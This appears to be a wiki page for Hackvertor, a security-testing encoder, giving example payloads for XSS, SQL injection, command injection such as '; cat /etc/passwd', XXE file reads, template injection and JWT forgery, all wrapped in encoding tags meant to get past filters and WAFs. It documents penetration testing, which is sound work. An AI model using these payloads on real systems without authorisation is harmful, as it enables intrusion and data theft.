-
-
Notifications
You must be signed in to change notification settings - Fork 63
Security Testing Examples
Practical examples of using Hackvertor for common security testing scenarios.
Scenario: Testing for XSS where input is HTML encoded.
Payload:
<@html_entities><script>alert(1)</script></@html_entities>
Result: <script>alert(1)</script>
Scenario: Application decodes twice.
<@urlencode><@urlencode><script>alert(1)</script></@urlencode></@urlencode>
Scenario: XSS via data: URI.
<@base64><script>alert(document.domain)</script></@base64>
Use in: <a href="data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+">click</a>
Scenario: Filter bypasses using Unicode.
<@unicode_escapes>alert</@unicode_escapes>
Result: \u0061\u006c\u0065\u0072\u0074
<@hex_entities><img src=x onerror=alert(1)></@hex_entities>
Scenario: WAF blocks plain SQL keywords.
<@urlencode>' OR 1=1--</@urlencode>
<@sql_hex>admin</@sql_hex>
Result: 0x61646d696e
<@urlencode><@urlencode>' UNION SELECT * FROM users--</@urlencode></@urlencode>
Some applications decode Base64 parameters:
<@base64>'; DROP TABLE users;--</@base64>
Set up test credentials:
Variable: username = admin
Variable: password = <@range(1,1000,1)></@range>
Decode JWT payload:
<@jwt_get_payload>eyJhbGciOiJIUzI1NiIs...</@jwt_get_payload>
Create new JWT:
<@jwt('HS256','weak_secret')>{"sub":"admin","role":"admin"}</@jwt>
Try algorithm none:
<@jwt('NONE','')>{"sub":"admin"}</@jwt>
Basic Auth header:
Authorization: Basic <@base64><@get_username/>:<@get_password/></@base64>
URL encoded:
<@urlencode>; cat /etc/passwd</@urlencode>
<@hex_escapes>|ls -la</@hex_escapes>
For systems that decode Base64:
<@base64>; whoami</@base64>
<@base64><?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo></@base64>
<@urlencode_all><?xml version="1.0"?><!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><test>&xxe;</test></@urlencode_all>
<@urlencode>{{7*7}}</@urlencode>
<@urlencode>${7*7}</@urlencode>
<@urlencode><%= 7*7 %></@urlencode>
<@hex_entities>{{constructor.constructor('return this')()}}</@hex_entities>
Using HMAC for API signatures:
<@hmac_sha256('<@get_api_secret/>')><@context_body/></@hmac_sha256>
X-Timestamp: <@timestamp/>
X-Request-Hash: <@sha256><@context_body/></@sha256>
Generate all URL encoded characters:
<@urlencode_all><@range(0,255,1)></@range></@urlencode_all>
<@random_alphanum_mixed(32)></@random_alphanum_mixed>
<@set_variable1(false)>payload</@set_variable1>
Test 1: <@base64><@get_variable1/></@base64>
Test 2: <@urlencode><@get_variable1/></@urlencode>
Test 3: <@hex><@get_variable1/></@hex>
<@base64><@urlencode><@base64>payload</@base64></@urlencode></@base64>
<@html_entities><@urlencode><@base64><script>alert(1)</script></@base64></@urlencode></@html_entities>
Use Multi Encoder (Ctrl+Alt+M):
- Enter payload
- Select multiple encodings in Layer 1
- Add Layer 2 with more encodings
- Review all combinations
- Test promising results
<@gzip_compress>Large payload data here...</@gzip_compress>
<@deflate_compress('dynamic')>payload</@deflate_compress>
MD5: <@md5>password123</@md5>
SHA1: <@sha1>password123</@sha1>
SHA256: <@sha256>password123</@sha256>
Check if hash matches:
<@if_regex('<@sha256>candidate</@sha256>','known_hash','Match','No match')>check</@if_regex>
If you suspect XOR encryption:
<@xor_getkey('known_plaintext')>ciphertext</@xor_getkey>
<@rotN_bruteforce>encrypted_text</@rotN_bruteforce>
<@aes_encrypt('1234567890123456','AES/CBC/PKCS5Padding','1234567890123456')>plaintext</@aes_encrypt>
Original ID: <@context_param('id')/>
Encoded: <@base64><@context_param('id')/></@base64>
Original Auth: <@context_header('Authorization')/>
Decoded: <@d_base64><@context_header('Authorization')/></@d_base64>
Request Hash: <@sha256><@context_request/></@sha256>
Type: HTTP Handler Analysis: Request Code:
body = request.bodyToString()
# Encode specific parameter
import re
body = re.sub(r'password=([^&]+)', lambda m: 'password=' + base64.b64encode(m.group(1).encode()).decode(), body)
request.withBody(body)Type: HTTP Handler Analysis: Request Code:
import hashlib
body = request.bodyToString()
sig = hashlib.sha256(body.encode()).hexdigest()
request.withHeader('X-Signature', sig)- Start simple: Test single encodings before chaining
- Use Smart Decode: Understand how target decodes data
- Check responses: Verify encoding worked as expected
- Document findings: Note which encodings bypass which controls
- Use variables: Store payloads for consistency
- Multi Encoder: Explore combinations systematically
Getting Started
Reference
Features
Integration
Examples
Help